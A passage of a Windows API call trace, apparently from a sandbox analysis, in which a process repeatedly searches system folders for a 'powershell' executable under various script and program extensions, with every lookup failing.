	[0451.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.724] SetErrorMode (uMode=0x1) returned 0x1
	[0451.725] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.725] SetErrorMode (uMode=0x1) returned 0x1
	[0451.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.734] SetErrorMode (uMode=0x1) returned 0x1
	[0451.735] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.735] SetErrorMode (uMode=0x1) returned 0x1
	[0451.735] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.743] SetErrorMode (uMode=0x1) returned 0x1
	[0451.744] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.744] SetErrorMode (uMode=0x1) returned 0x1
	[0451.744] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.024] SetErrorMode (uMode=0x1) returned 0x1
	[0452.025] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.025] SetErrorMode (uMode=0x1) returned 0x1
	[0452.025] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.032] SetErrorMode (uMode=0x1) returned 0x1
	[0452.033] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.033] SetErrorMode (uMode=0x1) returned 0x1
	[0452.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.040] SetErrorMode (uMode=0x1) returned 0x1
	[0452.041] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.041] SetErrorMode (uMode=0x1) returned 0x1
	[0452.041] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.049] SetErrorMode (uMode=0x1) returned 0x1
	[0452.050] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.050] SetErrorMode (uMode=0x1) returned 0x1
	[0452.050] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.058] SetErrorMode (uMode=0x1) returned 0x1
	[0452.059] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.059] SetErrorMode (uMode=0x1) returned 0x1
	[0452.059] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.305] SetErrorMode (uMode=0x1) returned 0x1
	[0452.306] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0452.306] SetErrorMode (uMode=0x1) returned 0x1
	[0452.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.315] SetErrorMode (uMode=0x1) returned 0x1
	[0452.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.317] SetErrorMode (uMode=0x1) returned 0x1
	[0452.317] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.317] SetErrorMode (uMode=0x1) returned 0x1
	[0452.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.318] SetErrorMode (uMode=0x1) returned 0x1
	[0452.318] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.318] SetErrorMode (uMode=0x1) returned 0x1
	[0452.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.318] SetErrorMode (uMode=0x1) returned 0x1
	[0452.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.319] SetErrorMode (uMode=0x1) returned 0x1
	[0452.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.319] SetErrorMode (uMode=0x1) returned 0x1
	[0452.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.320] SetErrorMode (uMode=0x1) returned 0x1
	[0452.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.320] SetErrorMode (uMode=0x1) returned 0x1
	[0452.320] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.320] SetErrorMode (uMode=0x1) returned 0x1
	[0452.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.321] SetErrorMode (uMode=0x1) returned 0x1
	[0452.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.321] SetErrorMode (uMode=0x1) returned 0x1
	[0452.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.321] SetErrorMode (uMode=0x1) returned 0x1
	[0452.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.321] SetErrorMode (uMode=0x1) returned 0x1
	[0452.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.322] SetErrorMode (uMode=0x1) returned 0x1
	[0452.322] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.322] SetErrorMode (uMode=0x1) returned 0x1
	[0452.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.322] SetErrorMode (uMode=0x1) returned 0x1
	[0452.322] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.322] SetErrorMode (uMode=0x1) returned 0x1
	[0452.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.323] SetErrorMode (uMode=0x1) returned 0x1
	[0452.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.323] SetErrorMode (uMode=0x1) returned 0x1
	[0452.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.323] SetErrorMode (uMode=0x1) returned 0x1
	[0452.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.323] SetErrorMode (uMode=0x1) returned 0x1
	[0452.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.324] SetErrorMode (uMode=0x1) returned 0x1
	[0452.324] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.324] SetErrorMode (uMode=0x1) returned 0x1
	[0452.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.324] SetErrorMode (uMode=0x1) returned 0x1
	[0452.324] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.325] SetErrorMode (uMode=0x1) returned 0x1
	[0452.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.325] SetErrorMode (uMode=0x1) returned 0x1
	[0452.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.325] SetErrorMode (uMode=0x1) returned 0x1
	[0452.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0452.326] SetErrorMode (uMode=0x1) returned 0x1
	[0452.326] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.326] SetErrorMode (uMode=0x1) returned 0x1
	[0452.326] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.326] SetErrorMode (uMode=0x1) returned 0x1
	[0452.326] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.327] SetErrorMode (uMode=0x1) returned 0x1
	[0452.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.327] SetErrorMode (uMode=0x1) returned 0x1
	[0452.327] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.327] SetErrorMode (uMode=0x1) returned 0x1
	[0452.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.328] SetErrorMode (uMode=0x1) returned 0x1
	[0452.328] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.328] SetErrorMode (uMode=0x1) returned 0x1
	[0452.328] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.328] SetErrorMode (uMode=0x1) returned 0x1
	[0452.328] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.329] SetErrorMode (uMode=0x1) returned 0x1
	[0452.329] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.329] SetErrorMode (uMode=0x1) returned 0x1
